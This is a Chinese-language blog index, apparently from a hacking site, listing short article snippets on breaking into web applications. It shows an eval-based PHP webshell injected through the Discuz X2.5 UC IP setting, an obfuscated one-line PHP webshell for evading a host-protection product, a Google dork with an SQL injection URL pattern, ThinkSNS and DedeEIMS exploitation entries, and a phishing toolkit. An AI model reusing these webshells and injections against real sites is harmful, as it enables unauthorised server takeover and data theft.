技术文章80

technical

Discuz X2.5后台最新拿webshell【转】

第一:我们进入后台已管理员身份就可以 然后打开站长→UC设置 看截图 在UCip地址里面填写 经过处理的一句话如下 Madman');eval($_POST[a])?>;// QQ 然后保存 ...
6,756

DedeEIMS v1.1 暴后台路径【转】

includedialogconfig.php //检验用户登录状态 $cuserLogin = new userLogin(); if($cuserLogin->getUserID()==- ...
16,095

Email钓鱼测试工具包—Phemail

Phemail这个安全测试工具包可以获取那些被Email钓鱼方式引诱的浏览器信息,但由于它并不使用任何web浏览器exploit、不包含任何攻击性,所以100%不会被杀毒软件探测。仅用于安全测试,禁止 ...
5,779

ThinkSNS后台拿shell漏洞

经过楼主的测试,可以通杀2.0——2.8版本。 未经同意,禁止转载。 程序名称:ThinkSNS 影响版本: 2.0——2.8 漏洞类型: 后台拿shell 漏洞位置: 全局-附件设置 版本确定: 1 ...
6,973

Supernews 2.6.1 sql注入漏洞

...
5,119

Doors web 注入漏洞

# Google dork: [inurl:"indice.php?page_id="] #exploit http://target.com.ar/indice.php?page_id=[sq ...
4,003

过护卫神PHP一句话(转)

<?php $a = str_replace(x,”",”axsxxsxexrxxt”); $a($_POST["c"]); ?> ...
4,342

近期评论

现在登录